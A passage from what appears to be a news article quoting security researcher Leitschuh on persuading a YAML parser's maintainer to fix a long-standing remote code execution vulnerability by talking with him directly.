"So he's now willing to fix this 6-year-old remote code execution vulnerability in this YAML Parser because someone like me sat down with him on a video call, finally, and had a conversation with him to convince him the minimal thing that he needed to do to make it more secure," he says.

While Leitschuh could have automated fixing the vulnerability downstream, the more elegant fix was having this discussion instead.

"I thought it was worth it for me to sit down and spend the time focusing on this one piece of software to try to convince this maintainer. Having those conversations is what's going to have a wider positive impact writ large on the entire industry," he says. "At that point you just need boots on the ground. You need people that know what they're talking about to sit down and spend time that is required to engage with an actual person."

Tag

#linux